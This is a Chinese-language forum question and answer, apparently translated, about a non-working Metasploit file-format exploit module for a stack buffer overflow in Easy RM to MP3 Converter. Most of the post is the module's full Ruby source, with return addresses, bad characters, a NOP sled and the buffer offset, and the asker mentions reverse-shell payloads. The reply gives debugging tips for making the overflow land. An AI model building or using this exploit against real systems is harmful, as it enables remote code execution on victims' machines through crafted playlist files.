metasploit的“Easyrmtomp3”漏洞利用模块存在问题

时间:2013-07-01 09:27:36

标签: exploit metasploit

![在此输入图像描述] [1]我开始学习一段时间后写作漏洞利用并创建了一些漏洞。其中一个是简单的rmmp3转换器,它工作得很好。 但是,现在我考虑将我的漏洞转换为metasploit模块,并按照许多文章中给出的步骤进行操作。但是,我面临的唯一错误是有效负载无法正常工作。最终,我求助于在线寻找类似的模块,并找到一个肯定应该工作的模块。但是,在使用meterpreter有效负载时,我不会返回计时器会话或shell。做了一些更改后,我就用了这个:

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
            'Name' => 'Easy RM to MP3 Converter (2.7.3.700) Stack Buffer Overflow',
      'Description'    => %q{
                This module exploits a stack buffer overflow in versions 2.7.3.700
               creating a specially crafted .m3u8 file, an attacker may be able 
               to execute arbitrary code.
      },
            'License' => MSF_LICENSE,
            'Author' => 
               [
                 'Crazy_Hacker', # Original
        'buzz',
               ],
            'Version' => 'Version 1',
            'References' =>
                [
                  [ 'URL', 'http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt' ],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload' =>
                {
                    'Space' => 1000,
                    'BadChars' => "\x00\x0a",
                    'StackAdjustment' => -3500,
                },
            'Platform' => 'win',
            'Targets' =>
                [

                  [ 'Windows XP SP2 (En)', { 'Ret' => 0x01A13F01} ], # Universal Address (MSRMCcodec02.dll)
                  [ 'Windows XP SP3 (Fr)', { 'Ret' => 0x01AAF23A} ], # FFE4 ,JMP, ESP from (MSRMCcodec02.dll)
                  [ 'Windows XP (Universal)', { 'Ret' => 0x773D4540} ], # JMP ESP in (SHELL32.DLL)
                ],
            'Privileged' => false,
            'DefaultTarget' => 1))

        register_options(
            [
                OptString.new('FILENAME', [ false, 'The file name.', 'buzz.m3u']),
            ], self.class)
    end


    def exploit

       sploit ="A"*26068 # rand_text_alphanumeric(26068) # Buffer Overflow
        sploit << [target.ret].pack('V')
        sploit << "\x90" * 30 # nopsled
        sploit << payload.encoded 
        sploit << "B"*1000
        buzz= sploit
        print_status("Creating '#{datastore['FILENAME']}' file ...")
        file_create(buzz)

    end

end

我尝试了一些有效负载:meterpreter/reverse_tcpshell/reverse_tcp,e.t.c。但似乎都没有。任何解决方案?

1 个答案:

答案 0 :(得分:0)

您还应该提供有关您正在使用的操作系统以及为运行该模块而提供的参数的更多详细信息。

正如您所看到的,指向Ret的指针因操作系统而异。

您是否已附加调试器以查看应用程序中发生了什么?从我可以看到和了解的漏洞是你的模糊字符串似乎不适合缓冲区

sploit =“A”* 26068

应该不止于此。附加调试器并查看是否已覆盖EIP。

此致 T0X1C